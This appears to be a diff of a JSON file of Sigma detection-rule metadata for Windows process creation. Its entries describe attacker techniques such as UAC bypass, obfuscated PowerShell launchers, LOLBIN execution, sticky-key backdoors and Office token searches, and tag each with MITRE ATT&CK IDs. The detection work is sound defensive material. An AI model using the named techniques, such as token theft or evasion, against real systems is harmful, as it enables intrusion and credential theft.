"c5c00f49-b3f9-45a6-997e-cfdecc6e1967", + "value": "Suspicious Schtasks Execution AppData Folder" + }, + { + "description": "Detects the pattern of UAC Bypass using scheduled tasks and variable expansion of cleanmgr.exe (UACMe 34)", + "meta": { + "author": "Christian Burkard", + "creation_date": "2021/08/30", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_uac_bypass_cleanmgr.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/hfiref0x/UACME", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_uac_bypass_cleanmgr.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" + ] + }, + "uuid": "b697e69c-746f-4a86-9f59-7bfff8eab881", + "value": "UAC Bypass Using Disk Cleanup" + }, + { + "description": "dotnet.exe will execute any DLL and execute unsigned code", + "meta": { + "author": "Beyu Denis, oscd.community", + "creation_date": "2020/10/18", + "falsepositive": [ + "System administrator Usage" + ], + "filename": "proc_creation_win_dotnet.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-73d61931b2c77fde294189ce5d62323b416296a7c23ea98a608f425566538d1a", - "https://lolbas-project.github.io/lolbas/Binaries/Forfiles/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_indirect_command_execution_forfiles.yml" + "https://twitter.com/_felamos/status/1204705548668555264", + "https://bohops.com/2019/08/19/dotnet-core-a-vector-for-awl-bypass-defense-evasion/", + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Dotnet/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dotnet.yml" ], "tags": [ - "attack.defense_evasion", - "attack.t1202" - ] - }, - "uuid": "a85cf4e3-56ee-4e79-adeb-789f8fb209a8", - "value": "Indirect Command Exectuion via Forfiles" - }, - { - "description": "Executes SCT script using scrobj.dll from a command in entered into a specially prepared INF file.", - "meta": { - "author": "frack113", - "creation_date": "2021/07/13", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_infdefaultinstall.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218/T1218.md#atomic-test-4---infdefaultinstallexe-inf-execution", - "https://lolbas-project.github.io/lolbas/Binaries/Infdefaultinstall/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_infdefaultinstall.yml" - ], - "tags": [ - "attack.defense_evasion", + "attack.execution", "attack.t1218" ] }, - "uuid": "ce7cf472-6fcc-490a-9481-3786840b5d9b", - "value": "InfDefaultInstall.exe .inf Execution" + "uuid": "d80d5c81-04ba-45b4-84e4-92eba40e0ad3", + "value": "Dotnet.exe Exec Dll and Execute Unsigned Code LOLBIN" }, { - "description": "Detects encoded base64 MZ header in the commandline", + "description": "Detects the import of a alternate datastream to the registry with regedit.exe.", "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/07/12", - "falsepositive": [ - "Unlikely" - ], - "filename": "proc_creation_win_inline_base64_mz_header.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://thedfirreport.com/2022/07/11/select-xmrig-from-sqlserver/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_inline_base64_mz_header.yml" - ], - "tags": [ - "attack.execution" - ] - }, - "uuid": "22e58743-4ac8-4a9f-bf19-00a0428d8c5f", - "value": "Base64 MZ Header In CommandLine" - }, - { - "description": "Detects the use of WinAPI Functions via the commandline as seen used by threat actors via the tool winapiexec", - "meta": { - "author": "Nasreddine Bencherchali", - "creation_date": "2022/09/06", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_inline_win_api_access.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/m417z/status/1566674631788007425", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_inline_win_api_access.yml" - ], - "tags": [ - "attack.execution", - "attack.t1106" - ] - }, - "uuid": "ba3f5c1b-6272-4119-9dbd-0bc8d21c2702", - "value": "Accessing WinAPI Via CommandLine" - }, - { - "description": "Detects the registration of a debugger for a program that is available in the logon screen (sticky key backdoor).", - "meta": { - "author": "Florian Roth, oscd.community, Jonhnathan Ribeiro", - "creation_date": "2019/09/06", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_install_reg_debugger_backdoor.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://blogs.technet.microsoft.com/jonathantrull/2016/10/03/detecting-sticky-key-backdoors/", - "https://bazaar.abuse.ch/sample/6f3aa9362d72e806490a8abce245331030d1ab5ac77e400dd475748236a6cc81/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_install_reg_debugger_backdoor.yml" - ], - "tags": [ - "attack.persistence", - "attack.privilege_escalation", - "attack.t1546.008" - ] - }, - "uuid": "ae215552-081e-44c7-805f-be16f975c8a2", - "value": "Suspicious Debugger Registration Cmdline" - }, - { - "description": "Detect an interactive AT job, which may be used as a form of privilege escalation.", - "meta": { - "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", - "creation_date": "2019/10/24", - "falsepositive": [ - "Unlikely (at.exe deprecated as of Windows 8)" - ], - "filename": "proc_creation_win_interactive_at.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.002/T1053.002.md", - "https://eqllib.readthedocs.io/en/latest/analytics/d8db43cf-ed52-4f5c-9fb3-c9a4b95a0b56.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_interactive_at.yml" - ], - "tags": [ - "attack.privilege_escalation", - "attack.t1053.002" - ] - }, - "uuid": "60fc936d-2eb0-4543-8a13-911c750a1dfc", - "value": "Interactive AT Job" - }, - { - "description": "Detects Obfuscated use of Clip.exe to execute PowerShell", - "meta": { - "author": "Jonathan Cheong, oscd.community", - "creation_date": "2020/10/13", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_invoke_obfuscation_clip.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_invoke_obfuscation_clip.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "b222df08-0e07-11eb-adc1-0242ac120002", - "value": "Invoke-Obfuscation CLIP+ Launcher" - }, - { - "description": "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block", - "meta": { - "author": "Daniel Bohannon (@Mandiant/@FireEye), oscd.community", - "creation_date": "2019/11/08", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_invoke_obfuscation_obfuscated_iex_commandline.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/danielbohannon/Invoke-Obfuscation/blob/f20e7f843edd0a3a7716736e9eddfa423395dd26/Out-ObfuscatedStringCommand.ps1#L873-L888", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_invoke_obfuscation_obfuscated_iex_commandline.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "4bf943c6-5146-4273-98dd-e958fd1e3abf", - "value": "Invoke-Obfuscation Obfuscated IEX Invocation" - }, - { - "description": "Detects Obfuscated use of stdin to execute PowerShell", - "meta": { - "author": "Jonathan Cheong, oscd.community", - "creation_date": "2020/10/15", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_invoke_obfuscation_stdin.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_invoke_obfuscation_stdin.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "6c96fc76-0eb1-11eb-adc1-0242ac120002", - "value": "Invoke-Obfuscation STDIN+ Launcher" - }, - { - "description": "Detects Obfuscated use of Environment Variables to execute PowerShell", - "meta": { - "author": "Jonathan Cheong, oscd.community", - "creation_date": "2020/10/15", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_invoke_obfuscation_var.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_invoke_obfuscation_var.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "27aec9c9-dbb0-4939-8422-1742242471d0", - "value": "Invoke-Obfuscation VAR+ Launcher" - }, - { - "description": "Detects Obfuscated Powershell via COMPRESS OBFUSCATION", - "meta": { - "author": "Timur Zinniatullin, oscd.community", - "creation_date": "2020/10/18", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_invoke_obfuscation_via_compress.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_invoke_obfuscation_via_compress.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "7eedcc9d-9fdb-4d94-9c54-474e8affc0c7", - "value": "Invoke-Obfuscation COMPRESS OBFUSCATION" - }, - { - "description": "Detects Obfuscated Powershell via RUNDLL LAUNCHER", - "meta": { - "author": "Timur Zinniatullin, oscd.community", - "creation_date": "2020/10/18", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_invoke_obfuscation_via_rundll.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_invoke_obfuscation_via_rundll.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "056a7ee1-4853-4e67-86a0-3fd9ceed7555", - "value": "Invoke-Obfuscation RUNDLL LAUNCHER" - }, - { - "description": "Detects Obfuscated Powershell via Stdin in Scripts", - "meta": { - "author": "Nikita Nazarov, oscd.community", + "author": "Oddvar Moe, Sander Wiebing, oscd.community", "creation_date": "2020/10/12", "falsepositive": [ "Unknown" ], - "filename": "proc_creation_win_invoke_obfuscation_via_stdin.yml", + "filename": "proc_creation_win_regedit_import_keys_ads.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_invoke_obfuscation_via_stdin.yml" + "https://lolbas-project.github.io/lolbas/Binaries/Regedit/", + "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regedit_import_keys_ads.yml" ], "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.t1112", + "attack.defense_evasion" ] }, - "uuid": "9c14c9fa-1a63-4a64-8e57-d19280559490", - "value": "Invoke-Obfuscation Via Stdin" + "uuid": "0b80ade5-6997-4b1d-99a1-71701778ea61", + "value": "Imports Registry Key From an ADS" }, { - "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", + "description": "Detects an executable in the users directory started from Microsoft Word, Excel, Powerpoint, Publisher or Visio", "meta": { - "author": "Nikita Nazarov, oscd.community", - "creation_date": "2020/10/09", + "author": "Jason Lynch", + "creation_date": "2019/04/02", "falsepositive": [ "Unknown" ], - "filename": "proc_creation_win_invoke_obfuscation_via_use_clip.yml", + "filename": "proc_creation_win_office_spawn_exe_from_users_directory.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_invoke_obfuscation_via_use_clip.yml" + "sha256=23160972c6ae07f740800fa28e421a81d7c0ca5d5cab95bc082b4a986fbac57c", + "https://blog.morphisec.com/fin7-not-finished-morphisec-spots-new-campaign", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_office_spawn_exe_from_users_directory.yml" ], "tags": [ - "attack.defense_evasion", - "attack.t1027", "attack.execution", - "attack.t1059.001" + "attack.t1204.002", + "attack.g0046", + "car.2013-05-002" ] }, - "uuid": "e1561947-b4e3-4a74-9bdd-83baed21bdb5", - "value": "Invoke-Obfuscation Via Use Clip" + "uuid": "aa3a6f94-890e-4e22-b634-ffdfd54792cc", + "value": "MS Office Product Spawning Exe in User Dir" }, { - "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", - "meta": { - "author": "Nikita Nazarov, oscd.community", - "creation_date": "2020/10/08", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_invoke_obfuscation_via_use_mhsta.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_invoke_obfuscation_via_use_mhsta.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "ac20ae82-8758-4f38-958e-b44a3140ca88", - "value": "Invoke-Obfuscation Via Use MSHTA" - }, - { - "description": "Detects Obfuscated Powershell via use Rundll32 in Scripts", - "meta": { - "author": "Nikita Nazarov, oscd.community", - "creation_date": "2019/10/08", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_invoke_obfuscation_via_use_rundll32.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_invoke_obfuscation_via_use_rundll32.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "36c5146c-d127-4f85-8e21-01bf62355d5a", - "value": "Invoke-Obfuscation Via Use Rundll32" - }, - { - "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", - "meta": { - "author": "Timur Zinniatullin, oscd.community", - "creation_date": "2020/10/13", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_invoke_obfuscation_via_var.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/Neo23x0/sigma/issues/1009", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_invoke_obfuscation_via_var.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ] - }, - "uuid": "e9f55347-2928-4c06-88e5-1a7f8169942e", - "value": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION" - }, - { - "description": "Detects the use of IOX - a tool for port forwarding and intranet proxy purposes", + "description": "Detects the creation of scheduled tasks in user session", "meta": { "author": "Florian Roth", - "creation_date": "2022/10/08", + "creation_date": "2019/01/16", "falsepositive": [ - "Legitimate use" + "Administrative activity", + "Software installation" ], - "filename": "proc_creation_win_iox.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://github.com/EddieIvan01/iox", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_iox.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1090" - ] - }, - "uuid": "d7654f02-e04b-4934-9838-65c46f187ebc", - "value": "IOX Tunneling Tool" - }, - { - "description": "Detect the use of Jlaive to execute assemblies in a copied PowerShell", - "meta": { - "author": "Jose Luis Sanchez Martinez (@Joseliyo_Jstnk)", - "creation_date": "2022/05/24", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_jlaive_batch_execution.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://jstnk9.github.io/jstnk9/research/Jlaive-Antivirus-Evasion-Tool", - "https://github.com/ch2sh/Jlaive", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_jlaive_batch_execution.yml" - ], - "tags": [ - "attack.execution", - "attack.t1059.003" - ] - }, - "uuid": "0a99eb3e-1617-41bd-b095-13dc767f3def", - "value": "Jlaive Usage For Assembly Execution In-Memory" - }, - { - "description": "Detects the use of Ldifde.exe with specific command line arguments to potentially load an LDIF file containing HTTP-based arguments.\nLdifde.exe is present, by default, on domain controllers and only requires user-level authentication to execute.\n", - "meta": { - "author": "@gott_cyber", - "creation_date": "2022/09/02", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_ldifde_file_load.yml", - "level": "medium", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://twitter.com/0gtweet/status/1564968845726580736", - "https://strontic.github.io/xcyclopedia/library/ldifde.exe-979DE101F5059CEC1D2C56967CA2BAC0.html", - "https://docs.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc731033(v=ws.11)", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ldifde_file_load.yml" - ], - "tags": [ - "attack.command_and_control", - "attack.t1105", - "attack.defense_evasion", - "attack.t1218" - ] - }, - "uuid": "6f535e01-ca1f-40be-ab8d-45b19c0c8b7f", - "value": "Suspicious Ldifde Command Usage" - }, - { - "description": "Detects MSHTA.EXE spwaned by SVCHOST as seen in LethalHTA and described in report", - "meta": { - "author": "Markus Neis", - "creation_date": "2018/06/07", - "falsepositive": [ - "Unknown" - ], - "filename": "proc_creation_win_lethalhta.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://codewhitesec.blogspot.com/2018/07/lethalhta.html", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lethalhta.yml" - ], - "tags": [ - "attack.defense_evasion", - "attack.t1218.005" - ] - }, - "uuid": "ed5d72a6-f8f4-479d-ba79-02f6a80d7471", - "value": "MSHTA Spwaned by SVCHOST" - }, - { - "description": "Local accounts, System Owner/User discovery using operating systems utilities", - "meta": { - "author": "Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community", - "creation_date": "2019/10/21", - "falsepositive": [ - "Legitimate administrator or user enumerates local users for legitimate reason" - ], - "filename": "proc_creation_win_local_system_owner_account_discovery.yml", + "filename": "proc_creation_win_susp_schtask_creation.yml", "level": "low", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1033/T1033.md", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_local_system_owner_account_discovery.yml" + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_schtask_creation.yml" ], "tags": [ - "attack.discovery", - "attack.t1033", - "attack.t1087.001" + "attack.execution", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1053.005", + "attack.s0111", + "car.2013-08-001" ] }, - "uuid": "502b42de-4306-40b4-9596-6f590c81f073", - "value": "Local Accounts Discovery" + "uuid": "92626ddd-662c-49e3-ac59-f6535f12d189", + "value": "Scheduled Task Creation" }, { - "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", + "description": "Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable.", "meta": { - "author": "frack113", - "creation_date": "2022/02/11", + "author": "Nikita Nazarov, oscd.community", + "creation_date": "2020/10/16", "falsepositive": [ - "Legitimate use" + "Legitimate administration activities" ], - "filename": "proc_creation_win_logmein.yml", + "filename": "proc_creation_win_software_discovery.yml", "level": "medium", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-3---logmein-files-detected-test-on-windows", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_logmein.yml" + "https://github.com/harleyQu1nn/AggressorScripts", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1518/T1518.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_software_discovery.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1518" + ] + }, + "uuid": "e13f668e-7f95-443d-98d2-1816a7648a7b", + "value": "Detected Windows Software Discovery" + }, + { + "description": "In Kaspersky's 2020 Incident Response Analyst Report they listed legitimate tool \"Mouse Lock\" as being used for both credential access and collection in security incidents.", + "meta": { + "author": "Cian Heasley", + "creation_date": "2020/08/13", + "falsepositive": [ + "Legitimate uses of Mouse Lock software" + ], + "filename": "proc_creation_win_mouse_lock.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/klsecservices/Publications/blob/657deb6a6eb6e00669afd40173f425fb49682eaa/Incident-Response-Analyst-Report-2020.pdf", + "https://sourceforge.net/projects/mouselock/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mouse_lock.yml" + ], + "tags": [ + "attack.credential_access", + "attack.collection", + "attack.t1056.002" + ] + }, + "uuid": "c9192ad9-75e5-43eb-8647-82a0a5b493e3", + "value": "Mouse Lock Credential Gathering" + }, + { + "description": "Detects usage of the \"wusa.exe\" (Windows Update Standalone Installer) utility to extract cab using the \"/extract\" argument from suspicious paths", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/05", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_wusa_susp_cap_extraction_from_susp_paths.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.echotrail.io/insights/search/wusa.exe/", + "https://web.archive.org/web/20180331144337/https://www.fireeye.com/blog/threat-research/2018/03/sanny-malware-delivery-method-updated-in-recently-observed-attacks.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wusa_susp_cap_extraction_from_susp_paths.yml" + ], + "tags": [ + "attack.execution" + ] + }, + "uuid": "c74c0390-3e20-41fd-a69a-128f0275a5ea", + "value": "Wusa Extracting Cab Files From Suspicious Paths" + }, + { + "description": "Detects the redirection of an alternate data stream (ADS) of / within a Windows command line session", + "meta": { + "author": "frack113", + "creation_date": "2022/02/04", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_redirect_to_stream.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1564.004/T1564.004.md#atomic-test-3---create-ads-command-prompt", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_redirect_to_stream.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.004" + ] + }, + "uuid": "70e68156-6571-427b-a6e9-4476a173a9b6", + "value": "Cmd Stream Redirection" + }, + { + "description": "Detects possible search for office tokens via CLI by looking for the string \"eyJ0eX\". This string is used as an anchor to look for the start of the JWT token used by office and similar apps.", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/10/25", + "falsepositive": [ + "Legitimate command-lines containing the string mentioned in the command-line" + ], + "filename": "proc_creation_win_susp_office_token_search.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://mrd0x.com/stealing-tokens-from-office-applications/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_office_token_search.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1528" + ] + }, + "uuid": "6d3a3952-6530-44a3-8554-cf17c116c615", + "value": "Suspicious Office Token Search Via CLI" + }, + { + "description": "A General detection for svchost.exe spawning rundll32.exe with command arguments like C:\\windows\\system32\\davclnt.dll,DavSetCookie.\nThis could be an indicator of exfiltration or use of WebDav to launch code (hosted on WebDav Server).\n", + "meta": { + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "creation_date": "2020/05/02", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_webdav_client_execution.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/OTRF/detection-hackathon-apt29/issues/17", + "https://threathunterplaybook.com/evals/apt29/detections/7.B.4_C10730EA-6345-4934-AA0F-B0EFCA0C4BA6.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_webdav_client_execution.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1048.003" + ] + }, + "uuid": "2dbd9d3d-9e27-42a8-b8df-f13825c6c3d5", + "value": "Suspicious WebDav Client Execution" + }, + { + "description": "Detects a suspicious call to the user32.dll function that locks the user workstation", + "meta": { + "author": "frack113", + "creation_date": "2022/06/04", + "falsepositive": [ + "Scripts or links on the user desktop used to lock the workstation instead of Windows+L or the menu option" + ], + "filename": "proc_creation_win_susp_rundll32_user32_dll.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://app.any.run/tasks/2aef9c63-f944-4763-b3ef-81eee209d128/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rundll32_user32_dll.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "3b5b0213-0460-4e3f-8937-3abf98ff7dcc", + "value": "Suspicious Workstation Locking via Rundll32" + }, + { + "description": "Detects AnyDesk Remote Desktop silent installation. Which can be used by attackers to gain remote access.", + "meta": { + "author": "Ján Trenčanský", + "creation_date": "2021/08/06", + "falsepositive": [ + "Legitimate deployment of AnyDesk" + ], + "filename": "proc_creation_win_anydesk_silent_install.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://support.anydesk.com/Automatic_Deployment", + "https://twitter.com/TheDFIRReport/status/1423361119926816776?s=20", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_anydesk_silent_install.yml" ], "tags": [ "attack.command_and_control", "attack.t1219" ] }, - "uuid": "d85873ef-a0f8-4c48-a53a-6b621f11729d", - "value": "Use of LogMeIn Remote Access Software" + "uuid": "114e7f1c-f137-48c8-8f54-3088c24ce4b9", + "value": "AnyDesk Silent Installation" }, { - "description": "Detects creation or execution of UserInitMprLogonScript persistence method", + "description": "The Tasks folder in system32 and syswow64 are globally writable paths.\nAdversaries can take advantage of this and load or influence any script hosts or ANY .NET Application \nin Tasks to load and execute a custom assembly into cscript, wscript, regsvr32, mshta, eventvwr\n", "meta": { - "author": "Tom Ueltschi (@c_APT_ure), Tim Shelton", - "creation_date": "2019/01/12", - "falsepositive": [ - "Exclude legitimate logon scripts" - ], - "filename": "proc_creation_win_logon_scripts_userinitmprlogonscript_proc.yml", - "level": "high", - "logsource.category": "process_creation", - "logsource.product": "windows", - "refs": [ - "https://attack.mitre.org/techniques/T1037/", - "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_logon_scripts_userinitmprlogonscript_proc.yml" - ], - "tags": [ - "attack.t1037.001", - "attack.persistence" - ] - }, - "uuid": "0a98a10c-685d-4ab0-bddc-b6bdd1d48458", - "value": "Logon Scripts (UserInitMprLogonScript)" - }, - { - "description": "This rule will monitor any office apps that spins up a new LOLBin process. This activity is pretty suspicious and should be investigated.", - "meta": { - "author": "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Michael Haag, Christopher Peacock @securepeacock (Update), SCYTHE @scythe_io (Update)", - "creation_date": "2021/08/23", + "author": "Sreeman", + "creation_date": "2020/01/13", "falsepositive": [ "Unknown" ], - "filename": "proc_creation_win_lolbins_by_office_applications.yml", + "filename": "proc_creation_win_task_folder_evasion.yml", "level": "high", "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", - "https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e", - 